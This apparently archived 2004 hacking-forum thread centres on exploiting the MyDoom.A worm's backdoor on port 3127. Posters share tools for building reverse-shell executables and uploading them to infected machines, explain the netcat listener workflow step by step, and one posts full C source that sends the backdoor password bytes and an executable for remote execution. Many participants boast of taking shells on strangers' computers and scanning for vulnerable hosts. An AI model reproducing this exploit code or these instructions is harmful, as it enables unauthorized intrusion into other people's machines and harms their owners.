Now it is here, one good friend of mine kralor.. Realeased this application's.. What the applications does, it uploads/and then/executes an application that can't be larger than 1599 bytes.. What my kralor also realeased was an application he made in ASM that creates a reverse shell program, that is under 1599bytes.. 1.536 if im not remembering wrong.. So now you can exploit MyDoom. And notice that it is only the version 'A' you can exploit So some information about this worm, (Only what i have seen) Port: 3127 What do it do: It is trying to DoS (Denial of Service) the site http://www.sco.com.. How it does this is simple, when many computers at once do it, it will crash and shut down. How it sends the DoS is like this simple HTTP Header: "GET / HTTP/1.1"
And guys, btw, Don't be to gay, Exploiting a virus isnt too skilly
rsCRPT by Kralor: To create the reverse Shell executable rsCRPT
MyKralor by Karlor: To upload and exec the executable on MyDoom.A MyKralor
Thanks to my friend kralor, and coromputer team Coromputer
sPiKie
Feb 9 2004, 03:00 PM
By the way, the time is 16:00 and http://www.sco.com/ is down FUN! Hehe...! Kinda lol that it is down, I don't know yet why it is down, probably alot of DoS attacks from kiddies/hackers.. etc..
clip
Feb 9 2004, 03:00 PM
QUOTE
What the applications does, it uploads/and then/executes an application that can't be larger than 1599 bytes..
I creaded this code a few days ago.. the paramters are doom.exe <executable> <host> <port>
It works perfectly for any sizeed executable.
Paul
Feb 9 2004, 03:04 PM
Saw this 10min earlier Tested it and it works, thnx for posting though
sPiKie
Feb 9 2004, 03:08 PM
Clip, your rite, but What the applications does, it uploads/and then/executes an application that can't be larger than 1599 bytes.. Thats what the application that KRALOR made does Nice code dude
clip
Feb 9 2004, 03:10 PM
oh.. ok.. so it's kinda a crippled exploit i guess..
sPiKie
Feb 9 2004, 03:18 PM
Yah Hehe, I think he made it because then everybody most download his Reverse Shell executable maker tool too (rsCRPT); But he is not what you call a newbie. And to be honest I think its ok that he published it. Because every scriptie will just upload there Optix or trojan and start playing...
T3cHn0b0y
Feb 9 2004, 03:20 PM
1.5kb's enough to do anything you want!
ripper2k3
Feb 9 2004, 03:25 PM
i cant undestand it really how i become a shell with this tools my must create the .exe and the upload and how i become the shell ? please explain it nearer for me
fre4k
Feb 9 2004, 03:42 PM
THX for this nice shit, I hope it will work
fre4k
sPiKie
Feb 9 2004, 03:51 PM
ripper2k3, your creating your Reverse Shell Executable with the rsCRPT tool, adding your IP Address, and your Listening port.. When I say listening port i mean the port your listening on a specified port.. You can/should use NetCat Network tool to listen for a connection on a port.. Then with your MyKralor tool, you just type the usage of the program like this... Syntax: mykralor.exe <infected ip> <port> <program to upload/execute> Thats all You should know how to do it now!!!
fre4k
Feb 9 2004, 04:16 PM
How do you mean this with nc? I don`t understand?!? sry
shaun2k2
Feb 9 2004, 04:33 PM
Nice thread so far, but I can see a few people spoiling it .
Please, I want to remind people of something: Recently, registration was closed, and trial membership was introduced. This was intended to stop script kiddies ruining the board. Please do not ask how to use the information provided in the thread - think of it like this: if you don't know how to use the info, you probably SHOULDN'T.
Btw it Gives you Guest axx to the remote (or/and local Pc - depends on who did you tried it:))
Oberon1879
Feb 9 2004, 04:59 PM
aww. kinda pity that it is public now. weird file size restriction though.
Subx
Feb 9 2004, 05:02 PM
After i uploaded the file how i connect the shell? Telnet? plz tell me how :\
kenshin_efx
Feb 9 2004, 05:05 PM
very 10x dude, 10x for share, i hope this not down very fast that rpc, or dameware...
Grtz.
boshcash
Feb 9 2004, 05:08 PM
i got errors during compile , can someone compile clip's code , i dont like that restriction
Leonnetje
Feb 9 2004, 05:10 PM
QUOTE (sPiKie @ Feb 9 2004, 03:51 PM)
ripper2k3, your creating your Reverse Shell Executable with the rsCRPT tool, adding your IP Address, and your Listening port.. When I say listening port i mean the port your listening on a specified port.. You can/should use NetCat Network tool to listen for a connection on a port.. Then with your MyKralor tool, you just type the usage of the program like this... Syntax: mykralor.exe <infected ip> <port> <program to upload/execute> Thats all You should know how to do it now!!!
Strange... I've done all those things.. entered my IP + NetCat port. then save the Reverse Shell .exe and upload it with MyKralor-tool, but i can't seem to get a shell spawn @ my NetCat-window...
Am i doing something wrong ??
ripper2k3
Feb 9 2004, 05:15 PM
ahh its ok i have thinked it is harder but this way is easy to make
pe0n
Feb 9 2004, 05:25 PM
QUOTE
okay i have tried this exploit, but not succesed yet
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
i always get "Exiting" instead of a shell
i have netcat running and i have checked that the OS of victim pc is windows NT,XP or 2000
but no shell
anyone know what im doing wrong?
i wrote that earlier today, and only because i did not take the time to look properly i did not see that i have actually gotten a remote shell in the "netcat windows"
the windows where u type the exploit commands don't become your shell, it's the windows where you have netcat running... lol
btw great exploit - i have gotten some shells on this exploit already
kebab1701
Feb 9 2004, 05:35 PM
hmmm i'll need to try this one
MysteryMan
Feb 9 2004, 05:42 PM
yeahhhhhhhh .......
thanks man a lot i must check this .....
peace & loff ......
Subx
Feb 9 2004, 05:45 PM
How i connect the shell!! plz help,Netcat?
m1k3
Feb 9 2004, 05:56 PM
anyone know where the downloaded files go
FakoLy
Feb 9 2004, 06:09 PM
thanx really nice exploit i'm scanning for open 3127 ports and if i find some i will test this
btw, when you build your exe with rCST.exe you have to put the victim's ip adress and port you want the victim ip to listen to, not yours, that's maybe why you ain't got a shell pe0m..
oh and does somebody know where the files that you upload go in the victim's pc ? like in which directory ?
sPiKie
Feb 9 2004, 06:11 PM
Here is my code if anyone is interested, gonna post the compiled file in the File Downloads section too
CODE
/**************************************/ /* Copyrights 2004 sPiKie tha m4st3r */ /* Made to a friend */ /**************************************/ #include <stdio.h> #include <string.h> #include <winsock.h>
#pragma comment (lib,"ws2_32")
int main(int argc,char *argv[]) { int sockfd, numbytes;
struct hostent *he; struct sockaddr_in their_addr; // connector's address information char doompassword[] = "\x85\x13\x3c\x9e\xa2"; //the backdoors uses a password to open CreateProcess();) char buf[1024]; int read=0; FILE *fuckfile; WSADATA wsaData; //thihihi
fuckfile = fopen(argv[3],"rb"); if (fuckfile==NULL) { printf("[-] Open Failed\n"); return -1; } printf("[+] File found ready to send\n"); if(WSAStartup(0x101,&wsaData)) { printf("[-] Unable to load winsock.\n"); return -1; } if ((he=gethostbyname(argv[1])) == NULL) { // get the host info printf("[-] GetHostByName() Error!\n"); return -1; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[-] Can't open socket!\n"); return -1; } their_addr.sin_family = AF_INET; // host byte order their_addr.sin_port = htons(atoi(argv[2])); // port their_addr.sin_addr = *((struct in_addr *)he->h_addr); //memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) { printf("[-] Connecting error\n"); return -1; } printf("[+] Connected\n[+] Sending executable.\n"); send(sockfd,doompassword,5,0); //sending the password :) while (!feof(fuckfile)) { read = fread(buf,sizeof(char),sizeof(buf),fuckfile); if ((numbytes=send(sockfd,buf,read,0)) == -1) { printf("[-] Sending executable failed\n"); return -1; } printf("."); } printf("[+] All done, server have now executed your executable!\n"); closesocket(sockfd); WSACleanup(); return 0; }
/* Thanks to clip for his "password"
sPiKie
Feb 9 2004, 06:15 PM
FakoLy, I think it will goes too the /windows/system32 directory as an other name, but it will delete himself after the exploit.. The program uses the Win Function CreateProcess() ..
TheAngel
Feb 9 2004, 06:26 PM
thanx working as a charm but just guest permissions
Subx
Feb 9 2004, 06:28 PM
Spikie after uploading how i connets the shell?
DiJiTooL
Feb 9 2004, 06:38 PM
Spikie your exploit work GREAT !!!! nice job !! thanks u man !
Copkill
Feb 9 2004, 06:42 PM
Nice , nice ; works fine for me got some shells but sometimes no admin right´s ;(
great work
MFG Copkill
x1`
Feb 9 2004, 06:46 PM
well every file i try to send it just says its to big but its 797 KB (816,913 bytes)
and the other is 52.0 KB (53,248 bytes) can someone please think why its doing this?
SirSmokealot
Feb 9 2004, 06:51 PM
great work!!! but i don't see the thing about it.. most systems will already be patched..... but i'll give it a try anyways....
Fernando093
Feb 9 2004, 06:51 PM
Thanks for the new eXploit sPiKie,,,
Great work fella !
ducky
Feb 9 2004, 06:52 PM
QUOTE (Dickybob20 @ Feb 9 2004, 06:46 PM)
well every file i try to send it just says its to big but its 797 KB (816,913 bytes)
and the other is 52.0 KB (53,248 bytes) can someone please think why its doing this?
that's cuz 700+ kb is more than 1.5Kb !!!
btw...anyone managed to get root axx on this one?
FakoLy
Feb 9 2004, 06:52 PM
QUOTE (sPiKie @ Feb 9 2004, 06:15 PM)
FakoLy, I think it will goes too the /windows/system32 directory as an other name, but it will delete himself after the exploit.. The program uses the Win Function CreateProcess() ..
yeah in fact thanx Regards
x1`
Feb 9 2004, 06:55 PM
so what file sends succesfully , does it have to be a exe file or can it be a bat with echo commands
Yemoke
Feb 9 2004, 06:59 PM
For the people that have no shell, i had it to, but after a few try on different hosts i got one thanks mate, realy nice spikie
/edit/ i had admin rights....
x1`
Feb 9 2004, 07:06 PM
ok i forgot to use that crt thing m so i make the shell and choose port , it says as a windows file with no icon picture do i rename it to exe?
jimmy
Feb 9 2004, 07:07 PM
FakoLy
that's not correct As far as I can see you need to take your own ip and port ... I just executed my shell on a remote box manually and the nc listening on my comp got a shell
m1k3
Feb 9 2004, 07:21 PM
I tryed to compile that source with cygwin but it failed any ideas or any other ways like lcc or mingw
kebab1701
Feb 9 2004, 07:24 PM
im gettin shell after shell on this one by the way for u doubters
FakoLy
Feb 9 2004, 07:25 PM
QUOTE (jimmy @ Feb 9 2004, 07:07 PM)
FakoLy
that's not correct As far as I can see you need to take your own ip and port ... I just executed my shell on a remote box manually and the nc listening on my comp got a shell
hmm maybe this is why i ain't got a shell
QUOTE
C:\Documents and Settings\FakoLy>mykralor.exe x.x.x.x 3127 c:\windows\sy stem32\pasmx.exe [Crpt] mykralor v1.0 by kralor [Crpt] www.coromputer.net && IRC undernet #coromputer
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
C:\Documents and Settings\FakoLy>
no shell... i will try it with my ip and port thanx jimmy
x1`
Feb 9 2004, 07:27 PM
do u rename the file u made with the crt app to exe ? cause its just a plain file. also can i telnet instead of netcat , wil that work
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
ripper2k3, your creating your Reverse Shell Executable with the rsCRPT tool, adding your IP Address, and your Listening port.. When I say listening port i mean the port your listening on a specified port.. You can/should use NetCat Network tool to listen for a connection on a port.. Then with your MyKralor tool, you just type the usage of the program like this... 
